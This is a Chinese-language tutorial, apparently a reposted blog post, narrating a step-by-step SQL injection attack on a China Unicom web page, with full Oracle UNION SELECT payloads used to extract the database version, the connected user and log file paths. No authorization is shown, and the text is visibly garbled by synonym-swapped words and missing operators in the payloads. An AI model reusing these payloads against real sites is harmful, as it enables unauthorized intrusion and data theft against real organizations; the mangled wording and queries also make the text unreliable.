渗入中国联通








对中国联通网站的一次保险渗入渗出测试。下面我将浸透测试的进程具体的写出来，以供新手友人学习。程度还停留在完整依附黑客工具入侵的朋友可要尽力了。

渗透之前的信息打探的少不了的，然而我这里就不用大型黑客扫描软件，由于大型扫描软件发送大批的数据包，轻易梗阻网络，有时候要视情形而定。那我们直接从WEB系统下手。翻开联通的站点,站点做点做的很美丽。一看程序是JSP的,预料之内，因为良多大型站点都爱用JSP构架的。打开谷歌搜寻引擎，收集该站的动态页面。然后一一测试每个动态衔接看是否存在注入漏洞。经由我的细心检测终于有所发明。这个地址链接是城市专栏的地址,提交一个单引,即时报错了。而后用经典的and 11测试返回正常如图1：



用and 12返回不正常,确实存在打针破绽。根据平时的入侵教训告知我，这种系统的后盾应当不是小型的数据库,极有可能是传说中的ORACLE数据库。Dual这个表是ORACLE数据库特有的,我们来看下它是否存在，假如存在就解释数据库为ORACLE。提交：And 0 (select count(.) from dual),返回了正常页面。如图2：



数据库现在已经明白了,现在我们来猜解字段数目。提交:order by 1，返回畸形。继承转变数字提交,当提交到order by 7 返回不正常了。Order by 6 是正常的，则阐明字段数量为6个。现在我们结构查问语句：and 11 null,null,null,null,null,null from dual 有的朋友可能会问为啥不必1，2，3，4，5，6呢·

因为ORACLE数据库是不主动匹配数据类型的，而null能够匹配任意数据类型，所以这样提交不会报错。 我们提交它返回了正常页面.现在我们来检测当前字段的数据类型，我们在null的前后加上 引,，如果返回正常则说明该字段为字符型，如果返回过错有可能是数字型的，如果不是数字型，那么就是其它类型了。

经过我的测试在第2 4 6地位加上 单引,均返回正常页面，说明这多少个字段是字符型的。

提交的语句：and201120union20select20null,'null',null,'null',null,'null'20from20dual 如图3



现在把没用单引,括起来的null换成对应的数字提交：and201220union20select201,'null',3,'null',5,'null'20from20dual 如图4：



图中显示了二个null，当初我们把所有的null都换成对应的数字：and201220union20select201,'2',3,'4',5,'6'20from20dual 如图5：



终于呈现了数字2，等下我们用他爆我们想要的数据。

现在我们来现在我们爆下ORACLE数据库的版本，把数字2替代成select banner from sys.v_$version where rownum1，完整语句为：and201220union20select201,(select20banner20from20sys.v_$version20where20rownum1),3,'4',5,'6'20from20dual 如图6：



现在来爆当前连接的用户名，把数字2替换为select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual完整语句：and201220union20select201,(select20SYS_CONTEXT20('USERENV',20'CURRENT_USER')20from20dual),3,'4',5,'6'20from20dual 爆出当前连接用户为CHINAUNI，如图7：



咱们持续爆操作体系的版本，调换为：select member from v$logfile where rownum1完全语句：and201220union20select201,(select20member20from20v$logfile20where20rownum1),3,'4',5,'6'20from20dual 依据系统的门路特点显示该系统不是WINDOWS系统如图8：